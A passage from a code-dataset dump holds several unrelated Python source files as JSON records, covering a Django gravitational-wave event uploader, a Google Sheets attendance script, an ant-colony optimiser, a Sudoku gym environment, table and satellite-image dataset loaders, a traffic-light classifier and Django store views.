'posterior' in ifile and ',' not in ifile]\n if len(post_files) == 0:\n return render(request, 'success.html', {'message' : \"No posterior files linked to event\"})\n #download files\n for ifile in post_files:\n r = client.files(gwevent.preferred_event, '{0}'.format(ifile))\n filepath = os.path.join(settings.MEDIA_ROOT, 'files', ifile)\n outfile = open('{0}'.format(filepath), 'wb')\n outfile.write(r.read())\n outfile.close()\n try:\n samples = pandas.read_hdf('{0}'.format(filepath), key='Overall_posterior')\n except:\n samples = pandas.read_table('{0}'.format(filepath), sep=' ') \n\n engine = create_engine(\"\"\"postgresql://{0}:{1}@gwsci.ciera.northwestern.edu:5432/gw_posteriors\"\"\".format(os.environ['GWSCI_USER'], os.environ['GWSCI_PASSWORD']))\n samples.to_sql('{0}_{1}'.format(gwevent.superevent_id, ifile.split('.')[0]), engine)\n engine.dispose()\n gwevent.posteriors_uploaded = True\n gwevent.save()\n if not gwevent.redshift_uploaded:\n print(\"Yep this is here\")\n if not gwevent.skymap_uploaded:\n print(\"Yep this is here\")\n return render(request, 'success.html', {'message' : \"This event was updated\"})\n else:\n return render(request, 'gw-event-form.html', {'form': form})\n","repo_name":"CIERA-Northwestern/gwinteract","sub_path":"gwinteract/newevent/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11179164970","text":"import pandas as pd\nfrom slackbot.bot import Bot, respond_to\nimport datetime\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport gspread\nfrom gspread_dataframe import set_with_dataframe\n\n\nclass Auth():\n # ワークブックまで開く処理\n SP_CREDENTIAL_FILE = \"./secrets/attendance.json\"\n SP_SCOPE = [\n 'https://spreadsheets.google.com/feeds',\n 'https://www.googleapis.com/auth/drive'\n ]\n SP_SHEET_KEY = '1AWzy25WkpHFmf83Y15--T-xZdXRFZ2ZALcLEOXGPkvc'\n\n def __init__(self):\n credentials = ServiceAccountCredentials.from_json_keyfile_name(self.SP_CREDENTIAL_FILE, self.SP_SCOPE)\n self.gc = gspread.authorize(credentials)\n # self.wb = gc.open_by_key(self.SP_SHEET_KEY)\n # self.sheet_name = sheet_name\n # self.wks = self.wb.worksheet(sheet_name)\n # self.df = pd.DataFrame(self.wks.get_all_records())\n\ndef punch_in(date, punch_in_time, sheet_name):\n auth = Auth()\n wb = auth.gc.open_by_key(auth.SP_SHEET_KEY)\n sheet_list = [ws.title for ws in wb.worksheets()]\n if sheet_name in sheet_list:\n wks = wb.worksheet(title=sheet_name)\n df = pd.DataFrame(wks.get_all_records())\n df = df.append({'日付': date, '出勤時刻': punch_in_time, '退勤時刻': '00:00', '働いた時間': '00:00'}, ignore_index=True)\n set_with_dataframe(wks, df)\n else:\n wks = wb.add_worksheet(title=sheet_name, rows=\"100\", cols=\"30\")\n df = pd.DataFrame(wks.get_all_records())\n df = df.append({'日付': date, '出勤時刻': punch_in_time, '退勤時刻': '00:00', '働いた時間': '00:00'}, ignore_index=True)\n set_with_dataframe(wks, df)\n\n \ndef punch_out(date, punch_out_time, sheet_name):\n auth = Auth()\n wb = auth.gc.open_by_key(auth.SP_SHEET_KEY)\n wks = wb.worksheet(title=sheet_name)\n cell = wks.find('0:00')\n # 退勤時刻記入\n wks.update_cell(cell.row, cell.col, punch_out_time)\n\n # working_hours算出\n df = pd.DataFrame(wks.get_all_records())\n time1 = df.iloc[-1, 1]\n time2 = df.iloc[-1, 2]\n in_time = datetime.datetime.strptime(time1, '%H:%M')\n out_time = datetime.datetime.strptime(time2, '%H:%M')\n # date_time = datetime.datetime.strptime(dte, '%H:%M')\n working_hours = str(out_time - in_time)\n print(working_hours)\n # working_hours記入\n wks.update_cell(cell.row, (cell.col + 1), working_hours)\n\n\n","repo_name":"hiro-551010/attendance","sub_path":"gsd.py","file_name":"gsd.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11215929346","text":"import random\nfrom typing import Tuple\n\nfrom optimization.optimization_method import OptimizationMethod\nfrom pmath.graphs.graphs import Graph\nfrom pmath.graphs.graphs import Node\nfrom pmath.rndgen.util import WeightedSelector\n\n\nclass ArtificalAnts_TS(OptimizationMethod):\n def __init__(self,\n graph: Graph,\n p=1.0, # pheromone multiplier\n d=5, # distance multiplier\n pheromone=0.4, # pheromone added per walk for best ant\n pheromone_min=0.1, # for worst ant\n # distance=1, # this can either be a float or F(value, iter, time)\n evaporation: float = 0.75, # this can either be a float or F(value, iter, time)\n normalized_time: bool = False, # whether time and iter should be normalized to max\n dist_name: str = \"dist\",\n gen_count = 100,\n pheromone_name: str = \"pheromone\",\n ):\n super().__init__(region=None)\n self.p = p\n self.d = d\n self.graph = graph\n self.agents = [graph]\n self.dist_name = dist_name\n self.pheromone_name = pheromone_name\n graph[\"line\"] = self.pheromone_name\n self.evaporation = evaporation\n self.normalized_time = normalized_time\n self.pheromone_min = pheromone_min\n # self.visited_cities = [] # Cities visited by each ant\n self.ants = []\n self.gen_count = gen_count\n self.init_population(gen_count=gen_count)\n self.selector = WeightedSelector()\n self.pheromone = pheromone\n self.handler = None\n\n def value_iter_time(self, value):\n iter = self.iteration\n if self.iteration_limit > 0:\n iter /= self.iteration_limit\n time = self.runtime\n if self.time_limit < float('inf'):\n time /= self.time_limit\n return value, iter, time\n\n def update_graph(self):\n for node in self.graph.nodes:\n for edge in node.edges:\n edge[self.pheromone_name] *= self.evaporation\n\n def init_population(self, agents=None, gen_count=30):\n if agents is None:\n self.ants = [[random.choice(self.graph.nodes), set(), 0, set()] for i in range(gen_count)]\n else:\n self.ants = agents\n\n def edge_weight(self, agent, edge):\n if edge.second in agent[1]:\n return 0\n\n return (edge[self.pheromone_name]) * self.p + (1 - edge[self.dist_name]) * self.d\n\n def call_methods(self):\n\n for j in range(len(self.graph.nodes)):\n for i, ant in enumerate(self.ants):\n ant = ant # type: Tuple[Node, set]\n\n ant[1].add(ant[0])\n if len(ant[1]) == len(self.graph.nodes):\n continue\n # print(ant[0])\n # print(ant[0].edges)\n edge = self.selector.choose(ant[0].edges, key=lambda cedge: self.edge_weight(ant, cedge))\n dist = ant[2] + edge[self.dist_name]\n next_city = edge.second\n new_set = ant[1]\n # edge[self.pheromone_name] = min(100, edge[self.pheromone_name] + self.pheromone)\n edge_set = ant[3]\n edge_set.add(edge)\n # if len(ant[1]) == len(self.graph.nodes):\n # new_set = set()\n\n new_ant = (next_city, new_set, dist, edge_set)\n self.ants[i] = new_ant\n\n self.ants.sort(key=lambda x: x[2])\n\n for i, ant in enumerate(self.ants):\n if i == 0:\n self.graph[\"best\"] = ant[2]\n i = 1 - (i / len(self.ants))\n i *= self.pheromone - self.pheromone_min\n i += self.pheromone_min\n for edge in ant[3]:\n edge[self.pheromone_name] += i\n edge[self.pheromone_name] = min(20, edge[self.pheromone_name])\n # print(edge[self.pheromone_name])\n self.update_graph()\n self.init_population(gen_count=self.gen_count)\n\n","repo_name":"piokra/sturdy-potato","sub_path":"optimization/ants.py","file_name":"ants.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14882076396","text":"from .conv_head import ConvHead\n#from .ctc_head import ctc_head\n\n__all__ = ['build_head']\nsupport_heads = ['ConvHead']\n\n\ndef build_head(head_name, **kwargs):\n assert head_name in support_heads, f'Invalid head {head_name}. Supported heads are {support_heads}'\n head = eval(head_name)(**kwargs)\n return head\n","repo_name":"SamitHuang/mindocr_test","sub_path":"mindocr/models/heads/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9425026789","text":"import gym\nfrom gym import spaces\nimport numpy as np\nimport sys\n\n\nresolved = 0\nunfinished = 1\nerror = 2\n\n\n# Check a solution is correct by checking the 3 contraints on all digits\n#\t- digit is unique in row\n#\t- digit is unique in column\n#\t- digit is unique in square\n# @return\n#\t- resolved if the grid is resolved\n#\t- unfinished if the grid is not yet finished\n#\t- error if one of the contraints is not respected\ndef checkSolution(grid):\n\tN = len(grid)\n\n\tfor i in range(N):\n\t\tfor j in range(N):\n\t\t\t# If a case is not filled, the sudoku is not finished\n\t\t\tif grid[i][j] == 0:\n\t\t\t\treturn unfinished\n\n\t\t\tn = N/3\n\t\t\tiOffset = i/n*n\n\t\t\tjOffset = j/n*n\n\t\t\tsquare = grid[ iOffset:iOffset + n , jOffset:jOffset + n].flatten()\n\t\t\t# Check uniqueness\n\t\t\tuniqueInRow = countItem(grid[i], grid[i, j]) == 1\n\t\t\tuniqueInCol = countItem(grid[:,j:j+1].flatten(), grid[i, j]) == 1\n\t\t\tuniqueInSquare = countItem(square, grid[i, j]) == 1\n\n\t\t\tif not (uniqueInRow and uniqueInCol and uniqueInSquare):\n\t\t\t\treturn error\n\n\treturn resolved\n\n\n# Count the number of time the item appears in a vector\ndef countItem(vector, item):\n\tcount = 0\n\tfor item2 in vector:\n\t\tif item2 == item: count += 1\n\treturn count\n\n\n# Recursivly find all solutions (backtracking)\n# @param stopAt make the backtracking stop when it found x solutions\n# @param i, j force to start the backtracking from the case (i, j)\n# @param omit prevent looking into a possibility\ndef getSolutions(grid, stopAt=1, i=-1, j=-1, omit=-1):\n\tN = len(grid)\n\tcheck = checkSolution(grid)\n\t# Check if grid is resolve or if there is an error\n\tif check == resolved:\n\t\treturn np.array([grid], dtype=int)\n\tif check == error:\n\t\treturn np.empty(shape=(0,N,N), dtype=int)\n\n\t# If i and j are not setted, get the first empty spot and start backtracking from it\n\tif i == -1:\n\t\tfor i in xrange(N):\n\t\t\tfor j in xrange(N):\n\t\t\t\t# If not empty spot continue\n\t\t\t\tif grid[i, j] == 0: break\n\t\t\tif grid[i, j] == 0: break\n\n\t# Randomize possible values\n\tvalues = np.arange(1, N+1)\n\tnp.random.shuffle(values)\n\t# Try all possiblities from those values until we reach the max nb of solutions asked by stopAt\n\tsolutions = np.empty(shape=(0,N,N), dtype=int)\n\tfor value in values:\n\t\tif omit == value: continue\n\t\tcGrid = np.copy(grid)\n\t\tcGrid[i, j] = value\n\t\tsubSolutions = getSolutions(cGrid, stopAt=stopAt-len(solutions))\n\t\tsolutions = np.concatenate((solutions, subSolutions))\n\t\tif len(solutions) >= stopAt:\n\t\t\treturn solutions\n\treturn solutions\n\n\nclass SudokuEnv(gym.Env):\n\tmetadata = {'render.modes': ['human']}\n\tlast_action = None\n\n\t# Make a random grid and store it in self.base\n\tdef __init__(self):\n\t\t# The box space is continuous. This don't apply to a sudoku grid, but there is no other choices\n\t\tself.observation_space = spaces.Box(low=1, high=9, shape=(9, 9))\n\t\tself.action_space = spaces.Tuple((spaces.Discrete(9), spaces.Discrete(9), spaces.Discrete(9)))\n\t\t# Get a random solution for an empty grid\n\t\tself.grid = []\n\t\tself.base = getSolutions(np.zeros(shape=(9,9)))[0]\n\t\t# Get all positions in random order, to randomly parse the grid\n\t\tN = len(self.base)\n\t\tpositions = []\n\t\tfor i in range(N):\n\t\t\tfor j in range(N):\n\t\t\t\tpositions.append((i, j))\n\t\tnp.random.shuffle(positions)\n\n\t\tcount = 0\n\t\t# Try to put 0 instead of the original value for all positions\n\t\t# Stop after 40 --> medium difficulty\n\t\t# This is slow after 40 because, the algorithm looks for 1 solutions when there is none,\n\t\t# so it realy check all the possibilities...\n\t\tfor i, j in positions:\n\t\t\tif count > 40:\n\t\t\t\tbreak\n\t\t\toldValue = self.base[i, j]\n\t\t\tself.base[i, j] = 0\n\t\t\tsolutions = getSolutions(self.base, stopAt=2, i=i, j=j, omit=oldValue)\n\t\t\tif len(solutions) == 0:\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\t# if more than one solution undo\n\t\t\t\tself.base[i, j] = oldValue\n\n\n\t# @return\n\t# \t- a copy of the grid to prevent alteration from the user\n\t# \t- a reward: - negative if action leads to an error\n\t#\t - positive if action is correct or grid is resolved\n\tdef step(self, action):\n\t\tself.last_action = action\n\t\toldGrid = np.copy(self.grid)\n\n\t\t# The user can't replace a value that was already set\n\t\tif self.grid[action[0], action[1]] != 0:\n\t\t\treturn np.copy(self.grid), -1, False, None\n\n\t\t# We add one to the action because the action space is from 0-8 and we want a value in 1-9\n\t\tself.grid[action[0], action[1]] = action[2]+1\n\n\t\tstats = checkSolution(self.grid)\n\t\t# If grid is complet or correct, return positive reward\n\t\tif stats == resolved:\n\t\t\treturn np.copy(self.grid), 1, True, None\n\t\telif stats == unfinished:\n\t\t\treturn np.copy(self.grid), 1, False, None\n\t\tif stats == error:\n\t\t\t# If move is wrong, return to old state, and return negative reward\n\t\t\tself.grid = oldGrid\n\t\t\treturn np.copy(self.grid), -1, False, None\n\n\n\t# Replace self.grid with self.base\n\t# Creating a new grid at every reste would be expensive\n\tdef reset(self):\n\t\tself.last_action = None\n\t\tself.grid = np.copy(self.base)\n\t\treturn np.copy(self.grid)\n\n\n\tdef render(self, mode='human', close=False):\n\n\t\tfor i in range(len(self.grid)):\n\t\t\tfor j in range(len(self.grid)):\n\t\t\t\tif self.last_action != None and i == self.last_action[0] and j == self.last_action[1]:\n\t\t\t\t\tif self.last_action[2] == self.grid[i, j]:\n\t\t\t\t\t\tsys.stdout.write('\\033[92m' + str(self.last_action[2]) + '\\033[0m')\n\t\t\t\t\telse:\n\t\t\t\t\t\tsys.stdout.write('\\033[91m' + str(self.last_action[2]) + '\\033[0m')\n\t\t\t\telse:\n\t\t\t\t\tsys.stdout.write(str(self.grid[i, j]))\n\t\t\t\tif j % 3 == 2 and j != len(self.grid)-1:\n\t\t\t\t\tsys.stdout.write(' | ')\n\t\t\tif i % 3 == 2 and i != len(self.grid)-1:\n\t\t\t\tsys.stdout.write('\\n---------------\\n')\n\t\t\telse:\n\t\t\t\tsys.stdout.write('\\n')\n\t\tsys.stdout.write('\\n\\n')\n\t\tsys.stdout.flush()\n\n\n# env = SudokuEnv()\n# env._reset()\n# print env.grid\n\n# grid = np.array(\n# [[0,0,0,4,0,9,0,0,1],\n# [0,0,4,0,3,0,0,2,0],\n# [0,7,2,0,5,1,0,0,6],\n# [4,2,1,0,0,5,6,0,0],\n# [8,0,0,0,0,2,0,0,0],\n# [3,0,0,9,0,0,0,0,0],\n# [0,1,0,5,7,4,0,0,0],\n# [5,0,6,0,0,3,0,0,7],\n# [0,0,3,0,9,0,0,1,0]])\n#\n# print getSolutions(grid)\n","repo_name":"artonge/gym-sudoku","sub_path":"gym_sudoku/envs/sudoku_env.py","file_name":"sudoku_env.py","file_ext":"py","file_size_in_byte":5938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5227962296","text":"import torch\nfrom torch.utils.data import Dataset\nimport albumentations as A\nimport jsonlines\nimport cv2\nfrom copy import copy\nimport numpy as np\nfrom utils.utils import load_elements\n\n\nclass PubTabNetLabelEncode:\n def __init__(\n self,\n elem_dict_path,\n ):\n self.elements = load_elements(elem_dict_path)\n self.dict_elem = {}\n for i, elem in enumerate(self.elements):\n self.dict_elem[elem] = i\n\n def index_encode(self, seq):\n _seq = ['sos'] + seq + ['eos']\n result = [self.dict_elem[elem.strip()] for elem in _seq]\n return result\n\n def get_bbox_for_each_tag(self, data, pad_value):\n bboxs = data['bboxs']\n tag_idxs = data['tag_idxs']\n\n td_idx = self.dict_elem['</td>']\n bbox_idx = 0\n result = []\n mask = np.zeros(len(tag_idxs), dtype=np.bool)\n for i, tag_idx in enumerate(tag_idxs):\n if (tag_idx == td_idx) and (bbox_idx < len(bboxs)):\n bbox = copy(bboxs[bbox_idx])\n if bbox[0] >= bbox[2]:\n bbox[2] = bbox[0]+1\n if bbox[1] >= bbox[3]:\n bbox[3] = bbox[1]+1\n result.append(bbox)\n bbox_idx += 1\n mask[i] = True\n else:\n result.append(copy(pad_value))\n return np.asarray(result), mask\n\n def one_hot(self, inputs):\n inputs = np.asarray(inputs)\n mask = np.zeros((inputs.size, inputs.max()+1))\n mask[np.arange(inputs.size), inputs] = 1\n return mask \n\n def __call__(self, data):\n pad_value = [0., 0., 1., 1.]\n \n data['tag_idxs'] = self.index_encode(data['tokens'])\n data['tag_bboxs'], data['bbox_mask'] = self.get_bbox_for_each_tag(data, pad_value)\n\n data['tag_idxs'] = self.one_hot(data['tag_idxs'])\n return data\n\n\nclass PubTabNet(Dataset):\n def __init__(self,\n annotation_file,\n img_dir,\n transform=None,\n target_transform=None,\n elem_dict_path='./utils/dict/table_elements.txt',\n ):\n super().__init__()\n with jsonlines.open(annotation_file, 'r') as reader:\n self.labels = list(reader)\n self.img_dir = img_dir\n self.transform = self.init_transform(transform, 256, 512)\n self.target_transform = target_transform\n self.label_encode = PubTabNetLabelEncode(elem_dict_path)\n\n @staticmethod\n def init_transform(transform_list, pad=256, resize=256):\n result = [\n # A.PadIfNeeded(pad, pad, border_mode=cv2.BORDER_CONSTANT, value=(255, 255, 255), position='top_left'),\n A.Resize(resize, resize),\n ]\n\n p = 0.05\n additional_transforms = [\n A.InvertImg(p=p),\n A.GaussianBlur(p=p),\n A.RandomToneCurve(p=p),\n A.ChannelShuffle(p=p),\n A.Solarize(p=p),\n A.ColorJitter(p=p),\n A.MedianBlur(p=p),\n # A.RandomShadow(p=p),\n A.RandomSunFlare(p=p, src_radius=40),\n ]\n\n if transform_list is not None:\n result += transform_list\n# result += additional_transforms\n\n result = A.Compose(\n result,\n bbox_params=A.BboxParams(format='pascal_voc', label_fields=['category_ids'])\n )\n return result\n \n def __getitem__(self, item):\n data = self.labels[item]\n filename = data['filename']\n image = self.read_image(filename)\n tokens = data['html']['structure']['tokens'].copy()\n bboxs = [c['bbox'] for c in data['html']['cells']]\n \n result = {\n 'image': image,\n 'tokens': tokens,\n 'bboxs': bboxs,\n }\n result = self.label_encode(result)\n category_ids = np.zeros(len(result['tag_bboxs']))\n\n transformed = self.transform(image=result['image'], bboxes=result['tag_bboxs'], category_ids=category_ids)\n result['image'] = torch.tensor(np.rollaxis(transformed['image'], 2, 0)/255)\n\n result['tag_bboxs'] = torch.tensor(transformed['bboxes'])\n result['tag_idxs'] = torch.tensor(result['tag_idxs'])\n result = self.normalize_bbox_coord(result)\n \n return result['image'].float(), (result['tag_idxs'].float(), result['tag_bboxs'].float())\n \n def prep_image(self, image):\n bboxs = np.asarray([[0, 0, 1, 1]])\n category_ids = np.zeros(len(bboxs))\n \n transformed = self.transform(image=image, bboxes=bboxs, category_ids=category_ids)\n image = torch.tensor(np.rollaxis(transformed['image'], 2, 0)/255)\n return image.float()\n\n def __len__(self):\n return len(self.labels)\n\n def read_image(self, img_name):\n image = cv2.imread(self.img_dir + img_name)\n return image\n\n @staticmethod\n def normalize_bbox_coord(data):\n data['tag_bboxs'][~data['bbox_mask']] = 0.0\n data['tag_bboxs'][:, [0, 2]] /= data['image'].shape[1]\n data['tag_bboxs'][:, [1, 3]] /= data['image'].shape[2]\n return data\n\n\nclass PubTabNetLabelDecode:\n def __init__(\n self,\n elem_dict_path,\n ):\n self.elements = load_elements(elem_dict_path)\n self.dict_elem = {}\n for i, elem in enumerate(self.elements):\n self.dict_elem[elem] = i\n\n def postprocess(self, struct, bboxs, h, w):\n struct = np.asarray(struct).argmax(axis=1).tolist()\n bboxs = bboxs.tolist()\n\n result_bbox = []\n result_struct = []\n result_struct_bbox = []\n\n for tag_idx, bbox in zip(struct, bboxs):\n x0, y0, x1, y1 = bbox\n x0, y0, x1, y1 = x0 * w, y0 * h, x1 * w, y1 * h\n bbox = [x0, y0, x1, y1]\n \n tag = self.elements[tag_idx]\n bbox_tag = self.elements[tag_idx]\n \n if tag == '</td>':\n bbox_tag = str(bbox) + tag\n result_bbox.append(bbox)\n if tag == 'sos':\n continue\n if tag == 'eos':\n break\n \n result_struct.append(tag)\n result_struct_bbox.append(bbox_tag)\n return result_struct, result_bbox, result_struct_bbox\n\n def __call__(self, image_batch, struct_batch, bbox_batch):\n result_struct = []\n result_bbox = []\n result_struct_bbox = []\n\n for img, struct, bbox in zip(image_batch, struct_batch, bbox_batch):\n height, width = img.shape[:2]\n struct, bbox, struct_bbox = self.postprocess(struct, bbox, height, width)\n struct_bbox = ''.join(struct_bbox)\n result_struct.append(struct)\n result_bbox.append(bbox)\n result_struct_bbox.append(struct_bbox)\n return result_struct, result_bbox, result_struct_bbox\n","repo_name":"Nazar96/TableEDD","sub_path":"data/pubtabnet.py","file_name":"pubtabnet.py","file_ext":"py","file_size_in_byte":6899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9667113341","text":"from osgeo import gdal\r\nimport os\r\nimport json\r\nfrom tqdm import tqdm\r\nimport argparse\r\n\r\ndef write_json_dict(save_path, load_dict):\r\n with open(save_path, \"w\") as f:\r\n json.dump(load_dict, f)\r\n\r\ndef split(label_path, image_path, count, block=512):\r\n result_dict = {}\r\n data = gdal.Open(label_path)\r\n width = data.RasterXSize\r\n height = data.RasterYSize\r\n for x in range(0, width, block):\r\n if width < block:\r\n block_x = width\r\n else:\r\n block_x = width - x if block > width - x else block\r\n for y in range(0, height, block):\r\n if height < block:\r\n block_y = height\r\n else:\r\n block_y = height - y if block > height - y else block\r\n result_dict[str(count)] = {\r\n 'imagePath': image_path,\r\n 'labelPath': label_path,\r\n 'x': x,\r\n 'y': y,\r\n 'block_x': block_x,\r\n 'block_y': block_y,\r\n 'width': width,\r\n 'height': height\r\n }\r\n count += 1\r\n return result_dict, count\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--image_root', default='./GID/Large-scale-Classification_5classes/image_RGB/')\r\n parser.add_argument('--label_root', default='./GID/Large-scale-Classification_5classes/label_5classes/')\r\n args = parser.parse_args()\r\n\r\n image_list = os.listdir(args.image_root)\r\n image_list_train = image_list[0:120]\r\n image_list_test = image_list[120:len(image_list)]\r\n\r\n count = 0\r\n result_all_train = {}\r\n for imagename in tqdm(image_list_train):\r\n if imagename[-4:] == '.tif':\r\n image_path = os.path.join(args.image_root, imagename)\r\n label_path = os.path.join(args.label_root, imagename.replace('.tif', '_label.tif'))\r\n assert os.path.exists(image_path)\r\n assert os.path.exists(label_path)\r\n result_dict, count = split(label_path, image_path, count, block=512)\r\n result_all_train.update(result_dict)\r\n write_json_dict('LCC5C_b512_woOverlap.json', result_all_train)\r\n\r\n count = 0\r\n result_all_test = {}\r\n for imagename in tqdm(image_list_test):\r\n if imagename[-4:] == '.tif':\r\n image_path = os.path.join(args.image_root, imagename)\r\n label_path = os.path.join(args.label_root, imagename.replace('.tif', '_label.tif'))\r\n assert os.path.exists(image_path)\r\n assert os.path.exists(label_path)\r\n result_dict, count = split(label_path, image_path, count, block=512)\r\n result_all_test.update(result_dict)\r\n write_json_dict('LCC5C_b512_woOverlap_test.json', result_all_test)\r\n","repo_name":"WHULuoJiaTeam/Model_Zoo","sub_path":"Semantic_Segmentation/UNet/GID/Ascend/1chip/code/train_test_split.py","file_name":"train_test_split.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"36702541475","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nfrom styx_msgs.msg import TrafficLight\n\n\nEPS = np.finfo('float32').eps\n\n\nclass TrafficLightClassifier:\n\n # Pretrained weights location\n checkpoint_path = './light_classification/pretrained_weights/mixed/TLC.ckpt'\n\n def __init__(self, input_shape, learning_rate):\n\n # Placeholders\n self.input_h, self.input_w = input_shape\n self.x = tf.placeholder(dtype=tf.float32, shape=[None, self.input_h, self.input_w, 3]) # input placeholder\n self.targets = tf.placeholder(dtype=tf.int32, shape=[None])\n self.keep_prob = tf.placeholder(dtype=tf.float32) # dropout keep probability\n\n self.n_classes = 4 # {void, red, yellow, green}\n self.learning_rate = learning_rate # learning rate used in train step\n\n self._inference = None\n self._loss = None\n self._train_step = None\n self._accuracy = None\n self._summaries = None\n\n self.inference\n self.loss\n self.train_step\n self.accuracy\n # self.summaries # todo add these\n\n @property\n def inference(self):\n if self._inference is None:\n with tf.variable_scope('inference'):\n\n kernel_regularizer = tf.contrib.layers.l2_regularizer(1e-3)\n conv1_filters = 32\n conv1 = tf.layers.conv2d(self.x, conv1_filters, kernel_size=(3, 3), padding='same',\n activation=tf.nn.relu, kernel_regularizer=kernel_regularizer)\n pool1 = tf.layers.max_pooling2d(conv1, pool_size=(2, 2), strides=(2, 2), padding='same')\n\n conv2_filters = 64\n conv2 = tf.layers.conv2d(pool1, conv2_filters, kernel_size=(3, 3), padding='same',\n activation=tf.nn.relu, kernel_regularizer=kernel_regularizer)\n pool2 = tf.layers.max_pooling2d(conv2, pool_size=(2, 2), strides=(2, 2), padding='same')\n\n _, h, w, c = pool2.get_shape().as_list()\n pool2_flat = tf.reshape(pool2, shape=[-1, h * w * c])\n\n pool2_drop = tf.nn.dropout(pool2_flat, keep_prob=self.keep_prob)\n\n hidden_units = self.n_classes\n hidden = tf.layers.dense(pool2_drop, units=hidden_units, activation=tf.nn.relu)\n\n logits = tf.layers.dense(hidden, units=self.n_classes, activation=None)\n\n self._inference = tf.nn.softmax(logits)\n\n return self._inference\n\n @property\n def loss(self):\n if self._loss is None:\n with tf.variable_scope('loss'):\n predictions = self.inference\n targets_onehot = tf.one_hot(self.targets, depth=self.n_classes)\n self._loss = tf.reduce_mean(-tf.reduce_sum(targets_onehot * tf.log(predictions + EPS), reduction_indices=1))\n return self._loss\n\n @property\n def train_step(self):\n if self._train_step is None:\n with tf.variable_scope('training'):\n self._train_step = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss)\n return self._train_step\n\n @property\n def accuracy(self):\n if self._accuracy is None:\n with tf.variable_scope('accuracy'):\n correct_predictions = tf.equal(tf.argmax(self.inference, axis=1),\n tf.argmax(tf.one_hot(self.targets, depth=self.n_classes), axis=1))\n self._accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32))\n return self._accuracy\n\n def get_classification(self, sess, image):\n\n # Resize captured image to match input size\n image = cv2.resize(image, (self.input_w, self.input_h))\n\n # Preprocess image to be approximately in range [-1, 1]\n x = np.float32(image) - np.mean(image)\n x /= x.max()\n x = np.expand_dims(x, 0) # add dummy batch dimension\n\n # Predict\n pred = sess.run(self.inference, feed_dict={self.x: x, self.keep_prob: 1.})\n pred_idx = np.argmax(pred, axis=1) # from onehot to labels\n\n labels = ['NO SEMAPHORE', 'RED', 'YELLOW', 'GREEN']\n\n # print(labels[pred_idx])\n\n if labels[pred_idx] == 'NO SEMAPHORE':\n return TrafficLight.UNKNOWN\n elif labels[pred_idx] == 'RED':\n return TrafficLight.RED\n elif labels[pred_idx] == 'YELLOW':\n return TrafficLight.YELLOW\n elif labels[pred_idx] == 'GREEN':\n return TrafficLight.GREEN\n","repo_name":"jkocsis3/CarNdCapstone","sub_path":"ros/src/tl_detector/light_classification/traffic_light_classifier.py","file_name":"traffic_light_classifier.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19142081593","text":"from django.shortcuts import render,HttpResponse,redirect\nfrom django.http import JsonResponse\nfrom .models import *\nimport json\nimport datetime\nfrom .utils import cookieCart,cartData,guestOrder\nfrom django.views.generic import DetailView\nfrom django.urls import reverse\n\ndef store(request):\n if request.method == 'POST':\n try:\n data = json.loads(request.body.decode('utf-8'))\n productId = data.get('productId')\n print('productId:', productId)\n\n if productId is not None:\n product = Product.objects.get(id=productId)\n print('productId:', product.brand)\n response_data = {'product_brand': product.brand,\n 'product_category':product.category,\n 'product_price':product.price,\n 'product_description': product.description,\n 'product_image':product.image.url}\n\n return JsonResponse(response_data, safe=False)\n \n data = cartData(request)\n cartItems = data['cartItems']\n order = data.get('order', None)\n items = data.get('items', [])\n\n products = Product.objects.all()\n context = {\n 'products': products,\n 'cartItems': cartItems,\n 'items': items,\n \n }\n \n\n return render(request, \"store/store.html\", context)\n else:\n return HttpResponse('Missing productId', status=400)\n\n except json.JSONDecodeError as e:\n return HttpResponse(str(e), status=400)\n elif request.method == 'GET':\n # Handle GET requests here\n data = cartData(request)\n cartItems = data['cartItems']\n products = Product.objects.all()\n context = {\n 'products': products,\n 'cartItems': cartItems,\n }\n return render(request, \"store/store.html\", context)\n \n \n return HttpResponse('Method Not Allowed', status=405)\n\ndef search_category(request):\n if request.method == 'POST':\n data = json.loads(request.body.decode('utf-8'))\n category = data.get('value') # Use 'value' as the key to match your JSON data\n products = Product.objects.filter(category=category)\n product_data = [{'id':product.id,'brand': product.brand, 'category':product.category,'image':product.image.url, 'price': product.price} for product in products]\n\n response_data = {'message': 'Category received successfully', 'category': category, 'products': product_data}\n return JsonResponse(response_data)\n\n return render(request, 'store/store.html')\n\nclass PostDetailView(DetailView):\n model = Product\n template_name = 'store/product_detail.html' \n \n def post(self, request, *args, **kwargs):\n product_id = kwargs['pk']\n review_text = request.POST.get('reviews') \n\n if review_text:\n review = Review.objects.create(\n product_id=product_id,\n user=request.user,\n comment_body=review_text,\n )\n \n return redirect('product-detail', pk=product_id)\n data = cartData(request)\n cartItems = data['cartItems']\n context = self.get_context_data(**kwargs)\n context['form_error'] = 'Please enter a valid review.'\n context['cartItems'] = cartItems\n return self.render_to_response(context)\n\ndef cart(request):\n data = cartData(request)\n cartItems = data['cartItems']\n order = data['order']\n items = data['items']\n context = {\n 'items':items,'order':order,'cartItems':cartItems\n }\n return render(request,\"store/cart.html\",context)\n\n\ndef checkout(request):\n \n data = cartData(request)\n cartItems = data['cartItems']\n order = data['order']\n items = data['items']\n\n context ={\n 